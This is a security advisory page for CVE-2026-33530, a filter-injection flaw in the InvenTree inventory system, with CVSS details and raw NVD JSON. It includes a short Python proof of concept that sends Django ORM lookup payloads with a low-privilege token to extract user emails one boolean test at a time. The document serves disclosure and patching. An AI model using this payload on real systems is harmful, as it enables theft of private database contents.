Security Vulnerability Report
中文
CVE-2026-33530 CVSS 7.7 HIGH

CVE-2026-33530

Published: 2026-03-26 20:16:15
Last Modified: 2026-04-01 18:48:48
Source: [email protected]

Description

InvenTree is an Open Source Inventory Management System. Prior to version 1.2.6, certain API endpoints associated with bulk data operations can be hijacked to exfiltrate sensitive information from the database. The bulk operation API endpoints (e.g. `/api/part/`, `/api/stock/`, `/api/order/so/allocation/`, and others) accept a filters parameter that is passed directly to Django's ORM queryset.filter(**filters) without any field allowlisting. This enables any authenticated user to traverse model relationships using Django's __ lookup syntax and perform blind boolean-based data extraction. This issue is patched in version 1.2.6, and 1.3.0 (or above). Users should update to the patched versions. No known workarounds are available.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:* - VULNERABLE
InvenTree < 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-33530: Blind Boolean-based Data Extraction via Django ORM # Target endpoint example url = "http://target-domain/api/part/" # Headers with low-privilege authentication token headers = { "Authorization": "Token <LOW_PRIV_TOKEN>", "Content-Type": "application/json" } # Malicious payload using Django ORM double underscore syntax # Attempting to traverse relationships to check sensitive data (e.g., User model) # Example: Checking if a user email starts with 'a' payload = { "filters": "owner__email__startswith=a" } response = requests.get(url, headers=headers, params=payload) if response.status_code == 200: # If results are returned, the condition is True data = response.json() if data: print(f"[+] Condition TRUE: Data found matching filter.") else: print("[-] Condition FALSE: No data found.") else: print(f"Request failed with status code: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33530", "sourceIdentifier": "[email protected]", "published": "2026-03-26T20:16:15.237", "lastModified": "2026-04-01T18:48:48.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvenTree is an Open Source Inventory Management System. Prior to version 1.2.6, certain API endpoints associated with bulk data operations can be hijacked to exfiltrate sensitive information from the database. The bulk operation API endpoints (e.g. `/api/part/`, `/api/stock/`, `/api/order/so/allocation/`, and others) accept a filters parameter that is passed directly to Django's ORM queryset.filter(**filters) without any field allowlisting. This enables any authenticated user to traverse model relationships using Django's __ lookup syntax and perform blind boolean-based data extraction. This issue is patched in version 1.2.6, and 1.3.0 (or above). Users should update to the patched versions. No known workarounds are available."}, {"lang": "es", "value": "InvenTree es un Sistema de Gestión de Inventario de Código Abierto. Antes de la versión 1.2.6, ciertos endpoints de la API asociados con operaciones de datos masivas pueden ser secuestrados para exfiltrar información sensible de la base de datos. Los endpoints de la API de operaciones masivas (por ejemplo, `/api/part/`, `/api/stock/`, `/api/order/so/allocation/`, y otros) aceptan un parámetro 'filters' que se pasa directamente a `queryset.filter(**filters)` del ORM de Django sin ninguna lista blanca de campos. Esto permite a cualquier usuario autenticado recorrer relaciones de modelos usando la sintaxis de búsqueda `__` de Django y realizar extracción de datos ciega basada en booleanos. Este problema está parcheado en la versión 1.2.6, y 1.3.0 (o superior). Los usuarios deben actualizar a las versiones parcheadas. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-202"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.6", "matchCriteriaId": "E308BCC2-3004-4830-92B8-4462819ECD0D"}]}]}], "references": [{"url": "https://github.com/inventree/InvenTree/pull/11581", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/inventree/InvenTree/security/advisories/GHSA-m8j2-vfmq-p6qg", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.